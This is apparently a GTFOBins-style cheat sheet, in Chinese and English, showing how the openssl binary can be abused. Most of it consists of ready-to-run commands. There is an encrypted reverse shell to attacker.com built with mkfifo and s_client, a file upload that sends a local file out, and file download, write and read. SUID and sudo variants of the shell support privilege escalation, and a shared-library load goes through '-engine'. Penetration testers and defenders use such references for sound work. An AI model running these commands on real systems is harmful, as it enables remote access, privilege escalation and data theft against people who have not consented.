.. / openssl

reverse-shell

向监听的端口发送反向shell，以打开远程网络访问。

• To receive the shell run the following on the attacker box: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 Communication between attacker and target will be encrypted.

  RHOST=attacker.com
  RPORT=12345
  mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
  

file-upload

上传文件到外部。

• To collect the file run the following on the attacker box: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save Send a local file via TCP. Transmission will be encrypted.

  RHOST=attacker.com
  RPORT=12345
  LFILE=要发送的文件
  openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE"
  

file-download

下载远程文件。

• To send the file run the following on the attacker box: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < 要发送的文件 Fetch a file from a TCP port, transmission will be encrypted.

  RHOST=attacker.com
  RPORT=12345
  LFILE=file_to_save
  openssl s_client -quiet -connect $RHOST:$RPORT > "$LFILE"
  

file-write

将数据写入文件中。

• LFILE=要写入的文件
  echo DATA | openssl enc -out "$LFILE"
  

  LFILE=要写入的文件
  TF=$(mktemp)
  echo "DATA" > $TF
  openssl enc -in "$TF" -out "$LFILE"
  

file-read

从文件中读取数据。

• LFILE=要读取的文件路径
  openssl enc -in "$LFILE"
  

suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

• To receive the shell run the following on the attacker box: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 Communication between attacker and target will be encrypted.

  RHOST=attacker.com
  RPORT=12345
  mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
  

  LFILE=要写入的文件
  echo DATA | openssl enc -out "$LFILE"
  

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• To receive the shell run the following on the attacker box: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 Communication between attacker and target will be encrypted.

  RHOST=attacker.com
  RPORT=12345
  mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
  

library-load

加载共享库，这些共享库可以被用来在二进制文件的执行上下文中运行代码。

• openssl req -engine ./lib.so